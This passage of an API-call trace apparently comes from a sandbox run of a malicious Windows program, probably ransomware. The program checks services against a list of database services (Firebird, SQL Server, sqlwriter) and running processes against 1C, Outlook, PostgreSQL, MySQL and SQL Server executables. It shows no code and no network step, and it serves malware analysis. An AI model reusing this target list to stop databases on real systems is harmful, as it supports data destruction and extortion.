lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0050.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0050.633] lstrlenW (lpString="lmhosts") returned 7 [0050.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0050.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0050.633] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0050.633] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0050.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0050.633] lstrlenW (lpString="MMCSS") returned 5 [0050.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0050.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0050.633] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0050.633] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0050.633] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0050.633] lstrlenW (lpString="MpsSvc") returned 6 [0050.633] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0050.633] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0050.633] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0050.633] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0050.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0050.634] lstrlenW (lpString="Netman") returned 6 [0050.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0050.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0050.634] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0050.634] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0050.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0050.634] lstrlenW (lpString="netprofm") returned 8 [0050.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0050.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0050.634] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0050.634] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0050.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0050.634] lstrlenW (lpString="NlaSvc") returned 6 [0050.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0050.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0050.634] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0050.634] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0050.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0050.634] lstrlenW (lpString="nsi") returned 3 [0050.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0050.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0050.634] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0050.634] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0050.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0050.634] lstrlenW (lpString="PcaSvc") returned 6 [0050.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0050.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0050.634] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0050.634] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0050.634] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0050.634] lstrlenW (lpString="PlugPlay") returned 8 [0050.634] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0050.634] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0050.635] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0050.635] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0050.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0050.635] lstrlenW (lpString="Power") returned 5 [0050.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0050.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0050.635] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0050.635] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0050.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0050.635] lstrlenW (lpString="ProfSvc") returned 7 [0050.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0050.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0050.635] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0050.635] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0050.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0050.635] lstrlenW (lpString="RpcEptMapper") returned 12 [0050.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0050.635] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0050.635] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0050.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0050.635] lstrlenW (lpString="RpcSs") returned 5 [0050.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0050.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0050.635] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0050.635] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0050.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0050.635] lstrlenW (lpString="SamSs") returned 5 [0050.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0050.635] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0050.635] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0050.635] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0050.635] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0050.635] lstrlenW (lpString="Schedule") returned 8 [0050.635] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0050.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0050.636] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0050.636] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0050.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0050.636] lstrlenW (lpString="SENS") returned 4 [0050.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0050.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0050.636] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0050.636] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0050.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0050.636] lstrlenW (lpString="ShellHWDetection") returned 16 [0050.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0050.636] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0050.636] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0050.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0050.636] lstrlenW (lpString="Spooler") returned 7 [0050.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0050.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0050.636] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0050.636] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0050.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0050.636] lstrlenW (lpString="swprv") returned 5 [0050.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1 [0050.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1 [0050.636] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1 [0050.636] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1 [0050.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1 [0050.636] lstrlenW (lpString="SysMain") returned 7 [0050.636] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0050.636] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0050.636] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0050.636] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0050.636] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0050.637] lstrlenW (lpString="Themes") returned 6 [0050.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0050.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0050.637] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0050.637] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0050.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0050.637] lstrlenW (lpString="TrkWks") returned 6 [0050.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1 [0050.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1 [0050.637] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1 [0050.637] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1 [0050.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1 [0050.637] lstrlenW (lpString="UxSms") returned 5 [0050.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0050.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0050.637] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0050.637] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0050.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0050.637] lstrlenW (lpString="VSS") returned 3 [0050.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1 [0050.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0050.637] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0050.637] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0050.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0050.637] lstrlenW (lpString="WdiServiceHost") returned 14 [0050.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0050.637] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0050.637] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0050.637] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0050.637] lstrlenW (lpString="WdiSystemHost") returned 13 [0050.637] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.637] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0050.637] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0050.638] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0050.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0050.638] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0050.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0050.638] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0050.638] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0050.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0050.638] lstrlenW (lpString="Winmgmt") returned 7 [0050.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0050.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0050.638] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0050.638] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0050.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0050.638] lstrlenW (lpString="WPDBusEnum") returned 10 [0050.638] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.638] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0050.638] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0050.638] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0050.638] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0050.638] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xbc83f8 | out: hHeap=0xb10000) returned 1 [0050.638] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f4 [0050.641] Process32FirstW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0050.642] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0050.642] lstrlenW (lpString="System") returned 6 [0050.642] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0050.643] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0050.643] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0050.643] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0050.643] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0050.643] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0050.643] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0050.643] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0050.643] lstrlenW (lpString="smss.exe") returned 8 [0050.643] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0050.643] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0050.643] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0050.643] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0050.644] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0050.644] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0050.644] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0050.644] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.644] lstrlenW (lpString="csrss.exe") returned 9 [0050.644] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0050.644] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0050.644] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0050.644] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0050.644] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0050.644] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0050.645] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0050.645] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0050.645] lstrlenW (lpString="wininit.exe") returned 11 [0050.645] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0050.645] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0050.645] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0050.646] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0050.646] lstrlenW (lpString="csrss.exe") returned 9 [0050.646] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0050.647] lstrlenW (lpString="winlogon.exe") returned 12 [0050.647] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0050.648] lstrlenW (lpString="services.exe") returned 12 [0050.648] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0050.649] lstrlenW (lpString="lsass.exe") returned 9 [0050.649] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0050.649] lstrlenW (lpString="lsm.exe") returned 7 [0050.649] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.650] lstrlenW (lpString="svchost.exe") returned 11 [0050.650] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.651] lstrlenW (lpString="svchost.exe") returned 11 [0050.651] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.652] lstrlenW (lpString="svchost.exe") returned 11 [0050.652] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.652] lstrlenW (lpString="svchost.exe") returned 11 [0050.653] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.653] lstrlenW (lpString="svchost.exe") returned 11 [0050.653] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0050.654] lstrlenW (lpString="audiodg.exe") returned 11 [0050.654] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.655] lstrlenW (lpString="svchost.exe") returned 11 [0050.655] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.656] lstrlenW (lpString="svchost.exe") returned 11 [0050.656] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0050.656] lstrlenW (lpString="dwm.exe") returned 7 [0050.657] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0050.657] lstrlenW (lpString="explorer.exe") returned 12 [0050.657] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0050.658] lstrlenW (lpString="spoolsv.exe") returned 11 [0050.658] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.659] lstrlenW (lpString="taskhost.exe") returned 12 [0050.659] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0050.660] lstrlenW (lpString="svchost.exe") returned 11 [0050.660] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0050.660] lstrlenW (lpString="taskeng.exe") returned 11 [0050.660] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0050.661] lstrlenW (lpString="taskhost.exe") returned 12 [0050.661] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ingredients posters keywords.exe")) returned 1 [0050.662] lstrlenW (lpString="ingredients posters keywords.exe") returned 32 [0050.662] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="moderate-instruments-repairs.exe")) returned 1 [0050.663] lstrlenW (lpString="moderate-instruments-repairs.exe") returned 32 [0050.663] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sa_shape.exe")) returned 1 [0050.664] lstrlenW (lpString="sa_shape.exe") returned 12 [0050.664] Process32NextW (in: hSnapshot=0x1f4, lppe=0x282fd34 | out: lppe=0x282fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="confidence.exe")) returned 1 [0050.664] lstrlenW (lpString="confidence.exe") returned 14 [0050.664] 